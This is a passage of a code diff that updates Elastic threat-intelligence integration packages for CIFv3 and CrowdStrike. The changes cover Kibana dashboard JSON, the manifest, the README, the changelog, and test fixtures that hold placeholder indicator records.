"cd81a60b-2661-48b3-a40f-ba8451e802a6", - "layerType": "data" + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" } }, "title": "", "type": "lens", - "visualizationType": "lnsMetric" + "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, "hidePanelTitles": false @@ -165,8 +190,7 @@ }, "panelIndex": "3a6a2852-0fb8-45df-9a79-e7729691fe5f", "title": "Unique Addresses [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -185,7 +209,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "c94400ee-a135-4a99-9693-5879d29f7aad": { "columnOrder": [ @@ -223,7 +247,7 @@ }, "title": "", "type": "lens", - "visualizationType": "lnsMetric" + "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, "hidePanelTitles": false @@ -237,8 +261,7 @@ }, "panelIndex": "02f1732b-a981-4fba-8b27-b944f2f3c98c", "title": "Unique Domains [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -257,7 +280,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "db89074c-e1fe-4091-bdb1-e42a36e82bac": { "columnOrder": [ @@ -272,7 +295,7 @@ "label": "Count", "operationType": "count", "scale": "ratio", - "sourceField": "Records" + "sourceField": "___records___" }, "b284ea2a-a2cd-4d08-bf44-fc73c08b5694": { "customLabel": true, @@ -337,19 +360,17 @@ }, "panelIndex": "8994501a-1550-4cf2-857f-d6b6491ffb62", "title": "Most Popular Domains [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" } ], "timeRestore": false, "title": "[Logs CIFv3] Emails", "version": 1 }, - "coreMigrationVersion": "8.0.0", + "coreMigrationVersion": "8.8.0", + "created_at": "2024-04-08T18:38:59.871Z", "id": "ti_cif3-bda23600-0abb-11ed-bcc0-01c79f2670f3", - "migrationVersion": { - "dashboard": "8.0.0" - }, + "managed": false, "references": [ { "id": "logs-*", @@ -361,6 +382,11 @@ "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", "type": "index-pattern" }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "type": "index-pattern" + }, { "id": "logs-*", "name": "3a6a2852-0fb8-45df-9a79-e7729691fe5f:indexpattern-datasource-current-indexpattern", @@ -392,15 +418,16 @@ "type": "index-pattern" }, { - "id": "logs-*", - "name": "c7c6e8dc-b649-434c-9650-8a1564d4d676:indexpattern-datasource-layer-88a112e1-6da1-49d3-9177-19f98280c200", - "type": "index-pattern" + "id": "ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", + "name": "tag-ref-ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", + "type": "tag" }, { - "id": "ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", - "name": "tag-ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", + "id": "ti_cif3-security-solution-default", + "name": "tag-ref-security-solution-default", "type": "tag" } ], - "type": "dashboard" + "type": "dashboard", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/ti_cif3/kibana/dashboard/ti_cif3-fef149c0-0a2f-11ed-bcc0-01c79f2670f3.json b/packages/ti_cif3/kibana/dashboard/ti_cif3-fef149c0-0a2f-11ed-bcc0-01c79f2670f3.json index 31b5359b56b..0f5d3c51dd1 100644 --- a/packages/ti_cif3/kibana/dashboard/ti_cif3-fef149c0-0a2f-11ed-bcc0-01c79f2670f3.json +++ b/packages/ti_cif3/kibana/dashboard/ti_cif3-fef149c0-0a2f-11ed-bcc0-01c79f2670f3.json @@ -1,7 +1,6 @@ { "attributes": { "description": "Dashboard providing statistics about URL type indicators from the Collective Intelligence Framework v3 integration", - "hits": 0, "kibanaSavedObjectMeta": { "searchSourceJSON": { "filter": [ @@ -46,6 +45,28 @@ "data_stream.dataset": "ti_cif3.feed" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } } ], "query": { @@ -57,6 +78,8 @@ "optionsJSON": { "hidePanelTitles": false, "syncColors": false, + "syncCursor": true, + "syncTooltips": false, "useMargins": true }, "panelsJSON": [ @@ -96,8 +119,7 @@ }, "panelIndex": "4c3ed6e1-8b4e-4eab-8d84-70ed4f506216", "title": "Files Navigation Textbox [Logs CIFv3]", - "type": "visualization", - "version": "8.0.0-SNAPSHOT" + "type": "visualization" }, { "embeddableConfig": { @@ -116,7 +138,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "88a112e1-6da1-49d3-9177-19f98280c200": { "columnOrder": [ @@ -154,7 +176,7 @@ }, "title": "", "type": "lens", - "visualizationType": "lnsMetric" + "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, "hidePanelTitles": false @@ -168,8 +190,7 @@ }, "panelIndex": "c7c6e8dc-b649-434c-9650-8a1564d4d676", "title": "Unique Ports [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -188,7 +209,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "a6fa56f8-32fa-405d-8771-dade4fe75d62": { "columnOrder": [ @@ -226,7 +247,7 @@ }, "title": "", "type": "lens", - "visualizationType": "lnsMetric" + "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, "hidePanelTitles": false @@ -240,8 +261,7 @@ }, "panelIndex": "73a752f9-bde5-4396-8ede-e9e77a37182d", "title": "Unique File Extensions [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -260,7 +280,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "c94400ee-a135-4a99-9693-5879d29f7aad": { "columnOrder": [ @@ -298,7 +318,7 @@ }, "title": "", "type": "lens", - "visualizationType": "lnsMetric" + "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, "hidePanelTitles": false @@ -312,8 +332,7 @@ }, "panelIndex": "02f1732b-a981-4fba-8b27-b944f2f3c98c", "title": "Unique Domains [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -332,7 +351,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "0f63318a-a857-4d83-89ce-a94e2242b79e": { "columnOrder": [ @@ -346,7 +365,7 @@ "label": "Records", "operationType": "count", "scale": "ratio", - "sourceField": "Records" + "sourceField": "___records___" }, "df0791a6-247c-4434-a43a-fdea7577ca34": { "dataType": "string", @@ -381,16 +400,17 @@ "layers": [ { "categoryDisplay": "default", - "groups": [ - "df0791a6-247c-4434-a43a-fdea7577ca34" - ], "layerId": "0f63318a-a857-4d83-89ce-a94e2242b79e", "layerType": "data", "legendDisplay": "show", - "legendSize": "auto", - "metric": "77a48096-02aa-4b7a-8a7b-131fc38988bd", + "metrics": [ + "77a48096-02aa-4b7a-8a7b-131fc38988bd" + ], "nestedLegend": false, - "numberDisplay": "percent" + "numberDisplay": "percent", + "primaryGroups": [ + "df0791a6-247c-4434-a43a-fdea7577ca34" + ] } ], "shape": "donut" @@ -412,8 +432,7 @@ }, "panelIndex": "ab7ab31c-e76f-4613-b17d-fdd909f17e0d", "title": "Percentage of URL Schema used [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -432,7 +451,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "db89074c-e1fe-4091-bdb1-e42a36e82bac": { "columnOrder": [ @@ -447,7 +466,7 @@ "label": "Count", "operationType": "count", "scale": "ratio", - "sourceField": "Records" + "sourceField": "___records___" }, "b284ea2a-a2cd-4d08-bf44-fc73c08b5694": { "customLabel": true, @@ -512,8 +531,7 @@ }, "panelIndex": "8994501a-1550-4cf2-857f-d6b6491ffb62", "title": "Most Popular Domains [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -532,7 +550,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "dfaa5b71-ed27-4602-9dbe-d263fd33aa05": { "columnOrder": [ @@ -546,7 +564,7 @@ "label": "Count of records", "operationType": "count", "scale": "ratio", - "sourceField": "Records" + "sourceField": "___records___" }, "c00d8a88-7047-4fa4-b99f-7e8be1370b6f": { "dataType": "string", @@ -581,15 +599,18 @@ "layers": [ { "categoryDisplay": "default", - "groups": [ - "c00d8a88-7047-4fa4-b99f-7e8be1370b6f" - ], "layerId": "dfaa5b71-ed27-4602-9dbe-d263fd33aa05", "layerType": "data", "legendDisplay": "default", - "metric": "14f7e661-8382-4e25-a998-10c6c576255e", + "legendSize": "auto", + "metrics": [ + "14f7e661-8382-4e25-a998-10c6c576255e" + ], "nestedLegend": false, - "numberDisplay": "percent" + "numberDisplay": "percent", + "primaryGroups": [ + "c00d8a88-7047-4fa4-b99f-7e8be1370b6f" + ] } ], "shape": "treemap" @@ -611,19 +632,17 @@ }, "panelIndex": "353bb92f-8375-4dc6-b961-9ed7f7509627", "title": "Most Popular File Extensions [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" } ], "timeRestore": false, "title": "[Logs CIFv3] URLs", "version": 1 }, - "coreMigrationVersion": "8.0.0", + "coreMigrationVersion": "8.8.0", + "created_at": "2024-04-08T18:38:01.582Z", "id": "ti_cif3-fef149c0-0a2f-11ed-bcc0-01c79f2670f3", - "migrationVersion": { - "dashboard": "8.0.0" - }, + "managed": false, "references": [ { "id": "logs-*", @@ -635,6 +654,11 @@ "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", "type": "index-pattern" }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "type": "index-pattern" + }, { "id": "logs-*", "name": "c7c6e8dc-b649-434c-9650-8a1564d4d676:indexpattern-datasource-current-indexpattern", @@ -696,15 +720,16 @@ "type": "index-pattern" }, { - "id": "logs-*", - "name": "fda93ed1-72f0-4489-80b7-9e69d14f30aa:indexpattern-datasource-layer-9fa49c4c-5544-472d-afce-e51d6a5687fe", - "type": "index-pattern" + "id": "ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", + "name": "tag-ref-ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", + "type": "tag" }, { - "id": "ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", - "name": "tag-ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", + "id": "ti_cif3-security-solution-default", + "name": "tag-ref-security-solution-default", "type": "tag" } ], - "type": "dashboard" + "type": "dashboard", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/ti_cif3/kibana/tag/ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1.json.json b/packages/ti_cif3/kibana/tag/ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1.json similarity index 54% rename from packages/ti_cif3/kibana/tag/ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1.json.json rename to packages/ti_cif3/kibana/tag/ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1.json index 5d464afed90..e5990bbf9ee 100644 --- a/packages/ti_cif3/kibana/tag/ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1.json.json +++ b/packages/ti_cif3/kibana/tag/ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1.json @@ -4,11 +4,11 @@ "description": "", "name": "CIFv3" }, - "coreMigrationVersion": "8.0.0", + "coreMigrationVersion": "8.8.0", + "created_at": "2024-04-08T18:33:58.759Z", "id": "ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", - "migrationVersion": { - "tag": "8.0.0" - }, + "managed": true, "references": [], - "type": "tag" + "type": "tag", + "typeMigrationVersion": "8.0.0" } \ No newline at end of file diff --git a/packages/ti_cif3/kibana/tag/ti_cif3-security-solution-default.json b/packages/ti_cif3/kibana/tag/ti_cif3-security-solution-default.json new file mode 100644 index 00000000000..753b6c2c22c --- /dev/null +++ b/packages/ti_cif3/kibana/tag/ti_cif3-security-solution-default.json @@ -0,0 +1,14 @@ +{ + "attributes": { + "color": "#FFA500", + "description": "Tag defined in package-spec", + "name": "Security Solution" + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-04-08T15:46:24.907Z", + "id": "ti_cif3-security-solution-default", + "managed": false, + "references": [], + "type": "tag", + "typeMigrationVersion": "8.0.0" +} \ No newline at end of file diff --git a/packages/ti_cif3/manifest.yml b/packages/ti_cif3/manifest.yml index f04e9e79ac4..dce74b0f503 100644 --- a/packages/ti_cif3/manifest.yml +++ b/packages/ti_cif3/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: ti_cif3 title: "Collective Intelligence Framework v3" -version: "1.10.1" +version: "1.12.0" description: "Ingest threat indicators from a Collective Intelligence Framework v3 instance with Elastic Agent." type: integration categories: @@ -9,7 +9,7 @@ categories: - threat_intel conditions: kibana: - version: "^8.7.1" + version: "^8.12.0" icons: - src: /img/csg_logo_big.svg title: csirtgadgets logo @@ -38,6 +38,7 @@ policy_templates: required: true show_user: true description: The CIFv3 API read token + secret: true owner: github: elastic/security-service-integrations type: community diff --git a/packages/ti_crowdstrike/_dev/build/docs/README.md b/packages/ti_crowdstrike/_dev/build/docs/README.md index 829b91c95c5..dee7d0b94a0 100644 --- a/packages/ti_crowdstrike/_dev/build/docs/README.md +++ b/packages/ti_crowdstrike/_dev/build/docs/README.md @@ -46,6 +46,16 @@ This module has been tested against the **CrowdStrike Falcon Intelligence API Ve 2. Client Secret 3. Token url 4. API Endpoint url +5. Required scopes for each data stream : + + | Data Stream | Scope | + | ------------- | ------------- | + | Intel | read:intel | + | IOC | read:iocs | + +Follow the [documentation](https://www.crowdstrike.com/blog/tech-center/consume-ioc-and-threat-feeds/) for enabling the scopes from the CrowdStrike console. + +User should either have `admin` role or `Detection Exception Manager` role to access IOCs endpoint. Follow the [documentation](https://falcon.crowdstrike.com/documentation/page/f20650df/default-roles-reference) for managing user roles and permissions. ### Enabling the integration in Elastic: diff --git a/packages/ti_crowdstrike/_dev/deploy/docker/files/config.yml b/packages/ti_crowdstrike/_dev/deploy/docker/files/config.yml index 526b7903768..1045d4232e3 100644 --- a/packages/ti_crowdstrike/_dev/deploy/docker/files/config.yml +++ b/packages/ti_crowdstrike/_dev/deploy/docker/files/config.yml @@ -16,11 +16,14 @@ rules: query_params: offset: 0 limit: 1 + filter: '{filter:_marker:>"[0-9]+"}' responses: - status_code: 200 headers: Content-Type: - application/json + Next-Page: + - /abc?_marker=123 body: |- { "meta": { @@ -123,7 +126,7 @@ rules: Authorization: - 'Bearer xxxx' query_params: - offset: 1 + _marker: 123 limit: 1 responses: - status_code: 200 diff --git a/packages/ti_crowdstrike/changelog.yml b/packages/ti_crowdstrike/changelog.yml index b4da440bce5..b981df5249f 100644 --- a/packages/ti_crowdstrike/changelog.yml +++ b/packages/ti_crowdstrike/changelog.yml @@ -1,4 +1,60 @@ # newer versions go on top +- version: "0.5.4" + changes: + - description: Add the ECS mappings to be useful for threat Intel rules. + type: enhancement + link: https://github.com/elastic/integrations/pull/9456 +- version: "0.5.3" + changes: + - description: Ensure integer timestamp is rendered as an integer. + type: bugfix + link: https://github.com/elastic/integrations/pull/9288 +- version: "0.5.2" + changes: + - description: Add ilm policy to intel data stream. + type: bugfix + link: https://github.com/elastic/integrations/pull/9274 +- version: "0.5.1" + changes: + - description: Add the mapping of hash sha1 type indicator. + type: enhancement + link: https://github.com/elastic/integrations/pull/9270 + - description: Add the offset in the config in case of unsuccessful requests. + type: enhancement + link: https://github.com/elastic/integrations/pull/9270 +- version: "0.5.0" + changes: + - description: Set sensitive values as secret, upgrade to package spec 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9238 +- version: "0.4.1" + changes: + - description: Typecast the cursor value to string and update Readme. + type: bugfix + link: https://github.com/elastic/integrations/pull/9225 +- version: "0.4.0" + changes: + - description: Adding support of Deep Pagination in Intel Data Stream. + type: enhancement + link: https://github.com/elastic/integrations/pull/9200 +- version: "0.3.1" + changes: + - description: Adding null checks to processors. + type: bugfix + link: https://github.com/elastic/integrations/pull/9156 +- version: "0.3.0" + changes: + - description: Improve error reporting for unsuccessful API queries. + type: enhancement + link: https://github.com/elastic/integrations/pull/9059 +- version: "0.2.0" + changes: + - description: Update Readme. + type: enhancement + link: https://github.com/elastic/integrations/pull/9013 + - description: Remove convert processor for the ip_address_type field. + type: enhancement + link: https://github.com/elastic/integrations/pull/9013 - version: "0.1.2" changes: - description: Changed owners diff --git a/packages/ti_crowdstrike/data_stream/intel/_dev/test/pipeline/test-intel.log b/packages/ti_crowdstrike/data_stream/intel/_dev/test/pipeline/test-intel.log index 6ca654e5859..cd54031fb0b 100644 --- a/packages/ti_crowdstrike/data_stream/intel/_dev/test/pipeline/test-intel.log +++ b/packages/ti_crowdstrike/data_stream/intel/_dev/test/pipeline/test-intel.log @@ -1,3 +1,7 @@ {"id":"hash_sha256_c98e1a7f563824cd448b47613743dcd1c853742b78f42b000192b83d","indicator":"c98e192bf71a7f97563824cd448b47613743dcd1c853742b78f42b000192b83d","type":"hash_sha256","deleted":false,"published_date":1700547356,"last_updated":1700547361,"reports":["reports"],"actors":["SALTYSPIDER"],"malware_families":["Mofksys"],"kill_chains":["Installation","C2"],"ip_address_types":["81.2.69.192"],"domain_types":["abc.com"],"malicious_confidence":"high","_marker":"17005473618d17ae6353d123235e4158c5c81f25f0","labels":[{"name":"MaliciousConfidence/High","created_on":1700547356,"last_valid_on":1700547360},{"name":"Malware/Mofksys","created_on":1700547359,"last_valid_on":1700547359},{"name":"ThreatType/Commodity","created_on":1700547359,"last_valid_on":1700547359},{"name":"ThreatType/CredentialHarvesting","created_on":1700547359,"last_valid_on":1700547359},{"name":"ThreatType/InformationStealer","created_on":1700547359,"last_valid_on":1700547359}],"relations":[{"id":"domain.com.yy","indicator":"domain.ds","type":"domain","created_date":1700547339,"last_valid_date":1700547339},{"id":"domain.xx.yy","indicator":"domain.xx.fd","type":"domain","created_date":1700547339,"last_valid_date":1700547339}],"targets":["abc"],"threat_types":["Commodity","CredentialHarvesting","InformationStealer"],"vulnerabilities":["vuln"]} {"id":"hash_md5_ea09ae9cc6768c50fcee903ed054556e5bfc8347907f12598aa24193","indicator":"d98f192bf91a7f97563824cd448b1c853742b78f42b9990192b83d","type":"hash_md5","deleted":true,"published_date":1700547346,"last_updated":1700547461,"reports":["reports"],"actors":["SALTYSPIDER"],"malware_families":["Trojan"],"kill_chains":["Installation","C2"],"ip_address_types":["81.2.69.192"],"domain_types":["domain.com"],"malicious_confidence":"low","_marker":"1800547361df353d123235e4158c5c81f25f0","labels":[{"name":"MaliciousConfidence/High","created_on":1700547390,"last_valid_on":1700547390},{"name":"Malware/Mofksys","created_on":1700547369,"last_valid_on":1700547369},{"name":"ThreatType/Commodity","created_on":1700547359,"last_valid_on":1700547359},{"name":"ThreatType/CredentialHarvesting","created_on":1700547359,"last_valid_on":1700547359},{"name":"ThreatType/InformationStealer","created_on":1700547359,"last_valid_on":1700547359}],"relations":[{"id":"domain.com.xx","indicator":"domain.xx","type":"domain","created_date":1700547339,"last_valid_date":1700547339},{"id":"domain.xx.yy","indicator":"domain.xx.fd","type":"domain","created_date":1700547339,"last_valid_date":1700547339}],"targets":["abc"],"threat_types":["Commodity","CredentialHarvesting","InformationStealer"],"vulnerabilities":["vuln"]} -{"id":"domain_ea09ae9cc6768c50fcee903ed054556e5bfc8347907f12598aa24193","indicator":"e88808f192bf563824cd448b1c853742b78f42b9990192b83d","type":"domain","deleted":true,"published_date":1700547346,"last_updated":1700547469,"reports":["reports"],"actors":["SALTYSPIDER"],"malware_families":["Trojan"],"kill_chains":["Installation","C2"],"ip_address_types":["81.2.69.192"],"domain_types":["domain.com"],"malicious_confidence":"low","_marker":"1800547361df353d123235e4158c5c81f25f0","labels":[{"name":"MaliciousConfidence/High","created_on":1700547390,"last_valid_on":1700547390},{"name":"Malware/Mofksys","created_on":1700547369,"last_valid_on":1700547369},{"name":"ThreatType/Commodity","created_on":1700547359,"last_valid_on":1700547359},{"name":"ThreatType/CredentialHarvesting","created_on":1700547359,"last_valid_on":1700547359},{"name":"ThreatType/InformationStealer","created_on":1700547359,"last_valid_on":1700547359}],"relations":[{"id":"domain.com.xx","indicator":"domain.xx","type":"domain","created_date":1700547339,"last_valid_date":1700547339},{"id":"domain.xx.yy","indicator":"domain.xx.fd","type":"domain","created_date":1700547339,"last_valid_date":1700547339}],"targets":["abc"],"threat_types":["Commodity","CredentialHarvesting","InformationStealer"],"vulnerabilities":["vuln"]} +{"id":"domain_ea09ae9cc6768c50fcee903ed054556e5bfc8347907f12598aa24193","indicator":"e88808f192bf563824cd448b1c853742b78f42b9990192b83d","type":"domain","deleted":true,"published_date":1700547346,"last_updated":1700547469,"reports":["reports"],"actors":["SALTYSPIDER"],"malware_families":["Trojan"],"kill_chains":["Installation","C2"],"ip_address_types":["C2"],"domain_types":["domain.com"],"malicious_confidence":"low","_marker":"1800547361df353d123235e4158c5c81f25f0","labels":[{"name":"MaliciousConfidence/High","created_on":1700547390,"last_valid_on":1700547390},{"name":"Malware/Mofksys","created_on":1700547369,"last_valid_on":1700547369},{"name":"ThreatType/Commodity","created_on":1700547359,"last_valid_on":1700547359},{"name":"ThreatType/CredentialHarvesting","created_on":1700547359,"last_valid_on":1700547359},{"name":"ThreatType/InformationStealer","created_on":1700547359,"last_valid_on":1700547359}],"relations":[{"id":"domain.com.xx","indicator":"domain.xx","type":"domain","created_date":1700547339,"last_valid_date":1700547339},{"id":"domain.xx.yy","indicator":"domain.xx.fd","type":"domain","created_date":1700547339,"last_valid_date":1700547339}],"targets":["abc"],"threat_types":["Commodity","CredentialHarvesting","InformationStealer"],"vulnerabilities":["vuln"]} +{"_marker":"17005473618d17ae6353d123235e4158c5c81f25f0","actors":[],"deleted":false,"domain_types":[],"id":"hash_md5_ea09ae9cc6768c50fcee903ed054556e5bfc8347907f12598aa24193","indicator":"e52faef955f651da029a4ee4fa227c0f","ip_address_types":[],"kill_chains":[],"labels":[{"created_on":1707938343,"last_valid_on":1707938355,"name":"MaliciousConfidence/High"},{"created_on":1707938347,"last_valid_on":1707938347,"name":"Malware/STOP"},{"created_on":1707938347,"last_valid_on":1707938347,"name":"ThreatType/Criminal"},{"created_on":1707938347,"last_valid_on":1707938347,"name":"ThreatType/Ransomware"}],"last_updated":1707938355,"malicious_confidence":"high","malware_families":["STOP"],"published_date":1707938343,"relations":[],"reports":[],"targets":[],"threat_types":["Criminal","Ransomware"],"type":"hash_md5","vulnerabilities":[]} +{"id":"hash_sha1_abcdxxxxxx","indicator":"t98f1xxxxxxxxxxxxxxc853742b78f42b9990192b83d","type":"hash_sha1","deleted":true,"published_date":1700547349,"last_updated":1700547471,"reports":["reports"],"actors":["SALTYSPIDER"],"malware_families":["Trojan"],"kill_chains":["Installation","C2"],"ip_address_types":["81.2.69.192"],"domain_types":["domain.com"],"malicious_confidence":"low","_marker":"1000547361df353d123235e4158c5c81f456f0","labels":[{"name":"MaliciousConfidence/High","created_on":1700547390,"last_valid_on":1700547390},{"name":"Malware/Mofksys","created_on":1700547369,"last_valid_on":1700547369},{"name":"ThreatType/Commodity","created_on":1700547359,"last_valid_on":1700547359},{"name":"ThreatType/CredentialHarvesting","created_on":1700547359,"last_valid_on":1700547359},{"name":"ThreatType/InformationStealer","created_on":1700547359,"last_valid_on":1700547359}],"relations":[{"id":"domain.com.xx","indicator":"domain.xx","type":"domain","created_date":1700547339,"last_valid_date":1700547339},{"id":"domain.xx.yy","indicator":"domain.xx.fd","type":"domain","created_date":1700547339,"last_valid_date":1700547339}],"targets":["abc"],"threat_types":["Commodity","CredentialHarvesting","InformationStealer"],"vulnerabilities":["vuln"]} +{"id":"url_dddxxx","indicator":"www.example.com","type":"url","deleted":false,"published_date":1700547349,"last_updated":1700547481,"reports":["reports"],"actors":["SALTYSPIDER"],"malware_families":["Trojan"],"kill_chains":["Installation","C2"],"ip_address_types":["81.2.69.192"],"domain_types":["abc.com"],"malicious_confidence":"medium","_marker":"1000547361df3d123235e4158c5c81f456f0","labels":[{"name":"MaliciousConfidence/High","created_on":1700547391,"last_valid_on":1700547391},{"name":"Malware/Mofksys","created_on":1700547369,"last_valid_on":1700547369},{"name":"ThreatType/Commodity","created_on":1700547359,"last_valid_on":1700547359},{"name":"ThreatType/CredentialHarvesting","created_on":1700547359,"last_valid_on":1700547359},{"name":"ThreatType/InformationStealer","created_on":1700547359,"last_valid_on":1700547359}],"relations":[{"id":"domain.com.xx","indicator":"domain.xx","type":"domain","created_date":1700547339,"last_valid_date":1700547339},{"id":"domain.xx.yy","indicator":"domain.xx.fd","type":"domain","created_date":1700547339,"last_valid_date":1700547339}],"targets":["abc"],"threat_types":["Commodity","CredentialHarvesting","InformationStealer"],"vulnerabilities":["vuln"]} +{"id":"ip_address_123xxxx","indicator":"81.2.69.192","type":"ip_address","deleted":true,"published_date":1700547349,"last_updated":1700547491,"reports":["reports"],"actors":["SALTYSPIDER"],"malware_families":["Trojan"],"kill_chains":["Installation","C2"],"ip_address_types":["81.2.69.192"],"domain_types":["domain.com"],"malicious_confidence":"low","_marker":"10005df353d123235e4158c5c81f456f0","labels":[{"name":"MaliciousConfidence/High","created_on":1700547395,"last_valid_on":1700547396},{"name":"Malware/Mofksys","created_on":1700547369,"last_valid_on":1700547369},{"name":"ThreatType/Commodity","created_on":1700547359,"last_valid_on":1700547359},{"name":"ThreatType/CredentialHarvesting","created_on":1700547359,"last_valid_on":1700547359},{"name":"ThreatType/InformationStealer","created_on":1700547359,"last_valid_on":1700547359}],"relations":[{"id":"domain.com.xx","indicator":"domain.xx","type":"domain","created_date":1700547339,"last_valid_date":1700547339},{"id":"domain.xx.yy","indicator":"domain.xx.fd","type":"domain","created_date":1700547339,"last_valid_date":1700547339}],"targets":["abc"],"threat_types":["Commodity","CredentialHarvesting","InformationStealer"]} diff --git a/packages/ti_crowdstrike/data_stream/intel/_dev/test/pipeline/test-intel.log-expected.json b/packages/ti_crowdstrike/data_stream/intel/_dev/test/pipeline/test-intel.log-expected.json index 021846ff896..c19e8fb4afd 100644 --- a/packages/ti_crowdstrike/data_stream/intel/_dev/test/pipeline/test-intel.log-expected.json +++ b/packages/ti_crowdstrike/data_stream/intel/_dev/test/pipeline/test-intel.log-expected.json @@ -16,11 +16,6 @@ "indicator" ] }, - "file": { - "hash": { - "sha256": "c98e192bf71a7f97563824cd448b47613743dcd1c853742b78f42b000192b83d" - } - }, "related": { "hash": [ "c98e192bf71a7f97563824cd448b47613743dcd1c853742b78f42b000192b83d" @@ -36,6 +31,11 @@ "threat": { "indicator": { "confidence": "High", + "file": { + "hash": { + "sha256": "c98e192bf71a7f97563824cd448b47613743dcd1c853742b78f42b000192b83d" + } + }, "name": "c98e192bf71a7f97563824cd448b47613743dcd1c853742b78f42b000192b83d", "provider": "crowdstrike", "type": "file" @@ -148,11 +148,6 @@ "indicator" ] }, - "file": { - "hash": { - "md5": "d98f192bf91a7f97563824cd448b1c853742b78f42b9990192b83d" - } - }, "related": { "hash": [ "d98f192bf91a7f97563824cd448b1c853742b78f42b9990192b83d" @@ -168,6 +163,11 @@ "threat": { "indicator": { "confidence": "Low", + "file": { + "hash": { + "md5": "d98f192bf91a7f97563824cd448b1c853742b78f42b9990192b83d" + } + }, "name": "d98f192bf91a7f97563824cd448b1c853742b78f42b9990192b83d", "provider": "crowdstrike", "type": "file" @@ -275,16 +275,11 @@ ], "id": "domain_ea09ae9cc6768c50fcee903ed054556e5bfc8347907f12598aa24193", "kind": "enrichment", - "original": "{\"id\":\"domain_ea09ae9cc6768c50fcee903ed054556e5bfc8347907f12598aa24193\",\"indicator\":\"e88808f192bf563824cd448b1c853742b78f42b9990192b83d\",\"type\":\"domain\",\"deleted\":true,\"published_date\":1700547346,\"last_updated\":1700547469,\"reports\":[\"reports\"],\"actors\":[\"SALTYSPIDER\"],\"malware_families\":[\"Trojan\"],\"kill_chains\":[\"Installation\",\"C2\"],\"ip_address_types\":[\"81.2.69.192\"],\"domain_types\":[\"domain.com\"],\"malicious_confidence\":\"low\",\"_marker\":\"1800547361df353d123235e4158c5c81f25f0\",\"labels\":[{\"name\":\"MaliciousConfidence/High\",\"created_on\":1700547390,\"last_valid_on\":1700547390},{\"name\":\"Malware/Mofksys\",\"created_on\":1700547369,\"last_valid_on\":1700547369},{\"name\":\"ThreatType/Commodity\",\"created_on\":1700547359,\"last_valid_on\":1700547359},{\"name\":\"ThreatType/CredentialHarvesting\",\"created_on\":1700547359,\"last_valid_on\":1700547359},{\"name\":\"ThreatType/InformationStealer\",\"created_on\":1700547359,\"last_valid_on\":1700547359}],\"relations\":[{\"id\":\"domain.com.xx\",\"indicator\":\"domain.xx\",\"type\":\